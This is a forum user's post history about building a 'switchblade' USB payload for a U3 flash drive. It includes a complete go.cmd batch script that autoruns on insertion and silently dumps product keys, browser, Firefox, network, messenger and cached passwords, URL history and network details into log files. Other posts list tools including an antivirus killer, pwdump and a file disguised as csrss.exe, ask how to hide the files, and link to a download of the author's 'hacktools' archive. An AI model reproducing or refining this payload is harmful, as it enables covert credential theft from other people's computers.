Jump to content

ickleangel

Active Members
  • Posts

    12
  • Joined

  • Last visited

Everything posted by ickleangel

  1. Hi, I was having the same problem with my disgo 1gb u3, here are the files i am using, http://rapidshare.com/files/20500437/DISGO.rar they contain the ones needed for the CD drive, and the ones for the FLASH partition, just remove/add anything else you need to go.cmd just create a new .iso using the universal customizer, hope this helps, ike,
  2. yeah that should work fine, funny thing is, this works on my non-u3 but not my u3 lol, ike,
  3. Here is my custom payload, has alot of apps in it, all built from the hak.5 wiki, http://rapidshare.com/files/13264612/ike-hacktools.rar its the non-u3 version, depending on your AV, it might detect some stuff as a hack tool, lol, ike,
  4. Hi, sorry not replied, been painting my laptop... if i understand correctly, the autorun.inf on the CD is the original one, the autorun.inf in the flash is the modified one pointing to go.cmd so in the CD i now have, original U3 stuff, Documents Folder, Launchpad Folder, LaunchU3.exe Autorun.inf the contents of the autorun on the CD partition [AutoRun] open=LaunchU3.exe icon=LaunchU3.exe,0 [Definitions] Launchpad=LaunchPad.exe [CopyFiles] FileNumber=1 File1=LaunchPad.zip on the flash i now have, Documents Folder (original u3) Launchpad Folder (original u3) launchu3.exe launchpad.zip i have also added these for my switchblade, WIP Folder containing 'tools' (wipcmdgo.cmd) Icons (containing custom icons) nircmd.exe (needed to run wipcmdgo.cmd????) and my Custom Autorun.inf the contents of the autorun.inf on my flash [autorun] action=Open Files On Folder icon=iconsdrive.ico shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd sorry to keep pestering you about this, thanks for all your help so far, ike,
  5. ok, so im super confused now, any chance you could write me up a complete idiot sheet? as i thought i needed to install a autorun.inf to the CDFS partition to point to the flash partition and the files to run them, or am i mistaken? sorry for taking up so much of your time on this, i really appreciate it, just want to get it working on my U3 drive as that works better so i have been led to believe, thanks again, ike,
  6. i thought it was that, but i was too tired to try it, so it should go like this: [CDFS] Autorun.inf U3 Launcher.exe (from original U3 file?) [FLASH] /WIP/CMD /WIP/DUMP etc? My current Autorun.inf - [autorun] action=Open Files On Folder icon=iconsike.ico shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd does this need to be modified to point to anywhere on the flash partition, or is it fine as it is? sorry for the noob questions, i just wanna make sure i dont destroy my drive, Thanks for your help so far, ike,
  7. nope, definately not write protected, without being a noob, but do the programs go on the iso or do they go onto the flash partition of the usb key? and only the autorun.inf goes in the iso? ike,
  8. its definately an admin account, cos its my own one lol how do i check if the USB is set to read only? thanks, ike,
  9. Hey guys and girls, i have succesfully installed my custom package onto my U3 drive, but when it runs i get this error, Error 5: Access is denied. is this because of the way the go.cmd is set up? WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log >> nul del /f /q [b]"WIPdump%computername%%computername%_pk.log"[/b] >nul or am i totally missing something? i installed my custom payload from the .iso created using the 'Universal_Customizer' suite, please guys, really need some help with this one, just doesn't want to be nice, i was thinking maybe its due to the way it tries to write the data to the CDROM part of the U3 drive? how would i change this in the go.cmd or do i need to do something completely different? here is the complete entry from my go.cmd in the /WIP/CMD folder in the .iso @echo off if not exist WIPdump md WIPdump >nul if not exist WIPdump%computername% md WIPdump%computername% >nul cd WIPCMD >nul .nircmd.exe execmd CALL WIPCMDWIRELESS.BAT .nircmd.exe execmd CALL WIPCMDDIR.BAT Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 Echo ***********[System info]************ >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> WIPdump%computername%%computername%.log 2>&1 ipconfig /all >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump Product Keys]****** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .produkey /nosavereg /stext "WIPdump%computername%%computername%_pk.log" /remote %computername% >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_pk.log" >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump IE7 secrets]******* >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .iepv.exe /stext "WIPdump%computername%%computername%_ie7.log" >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ie7.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_ie7.log" >nul Echo ************************************ >> WIPdump%computername%%computername%-updateslist.log 2>&1 echo ***********[Dump updates-list]******* >> WIPdump%computername%%computername%-updateslist.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%-updateslist.log 2>&1 .wul.exe /stext "WIPdump%computername%%computername%_LSA.log" >> WIPdump%computername%%computername%-updateslist.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_lsa.log* WIPdump%computername%%computername%-updateslist.log >> nul del /f /q "WIPdump%computername%%computername%_lsa.log" >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump Network PW]******** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .netpass.exe /stext "WIPdump%computername%%computername%_np.log" >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_np.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_np.log" >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ************[Dump Cache PW]********* >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .cachedump.exe >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Network Services]******* >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 netstat.exe -abn >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 echo ***********[Dump messenger PW]******** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .mspass.exe /stext "WIPdump%computername%%computername%_ms.log" >> WIPdump%computername%%computername%.log 2>&1 copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ms.log* WIPdump%computername%%computername%.log >> nul del /f /q "WIPdump%computername%%computername%_ms.log" >nul Echo ************************************ >> WIPdump%computername%%computername%-ie.log 2>&1 echo ***********[Dump URL History]******* >> WIPdump%computername%%computername%-ie.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%-ie.log 2>&1 .iehv.exe /stext "WIPdump%computername%%computername%_ie.log" >> WIPdump%computername%%computername%-ie.log 2>&1 set RtD=%CD% cd /D "%appdata%MozillaFirefoxProfiles" >nul set PROFILE= for /D %%i in (*) do set PROFILE=%%i cd /D %RtD% >nul Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 Echo *********[Dump Firefox PW]********** >> WIPdump%computername%%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1 .FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> WIPdump%computername%%computername%.log cd WIPdump%computername% >nul Echo ************************************ > WIPdump%computername%%computername%port.log 2>&1 echo ************[Port Scan]************* >> WIPdump%computername%%computername%port.log 2>&1 Echo ************************************ >> WIPdump%computername%%computername%port.log 2>&1 cd WIPCMDportqry -local -l WIPdump%computername%%computername%_ports.log>>nul copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ports.log >>nul del /f /q "WIPdump%computername%%computername%_ports.log" >nul cd WIPCMD >nul here is an upload of my original NON-U3 switchblade, http://rapidshare.com/files/13264612/ike-hacktools.rar the above is exactly what i put in my .iso and used ISOCreate.cmd with all the tools, from WIPCMD All help greatly appreciated, Thanks, ike,
  10. Hi guys and girls, Just got my U3 drive, 'Disgo Classic 1Gb' On the CD section of the drive are an autorun.inf pointing to 'LaunchU3.exe' [AutoRun] open=LaunchU3.exe icon=LaunchU3.exe,0 [Definitions] Launchpad=LaunchPad.exe [CopyFiles] FileNumber=1 File1=LaunchPad.zip and the launchpad.zip on the Flash section, there is 'LaunchU3.exe' and a 'Documents' folder, i know this is a cheap U3 drive, but it was free! i need some help installing a payload, i want one that does the same as my non-U3 drive does, which uses these tools, avkill.exe cachedump.exe csrss.exe FirePassword.exe go.cmd iehv.exe iepv.exe mspass.exe netpass.exe nircmd.exe PortQry.exe ProduKey.exe PwDump.exe pwservice.exe Trash.exe WIRELESS.BAT WirelessKeyView.exe wul.exe which payload do i need and how do i install it on my U3 drive? thanks, ike,
  11. yeah, thats what i wanted to do, wasnt sure if windows would recognise the autorun.inf if it was hidden, thanks, ike,
  12. Hi guys, just recently registered and have been looking through the forums and enjoy the site and the podcast very much, the problem i am having is i have a non-u3 pendrive which i have set-up as a switchblade to run the numerous programs using the autorun.inf and go.cmd/nircmd.exe what i was wondering is what files can i hide and which files need to be left visible for the programs to work? this is everything on my USB drive in WIPCMD avkill cachedump crss firepassword go.cmd iehv iepv mspass netpass nircmd portqry produkey pwdump pwservice wirelesskeyview wul can i just hide everyting including the nircmd.exe in the root folder? or will i need to leave the autorun.inf available? thanks, ike,
×
×
  • Create New...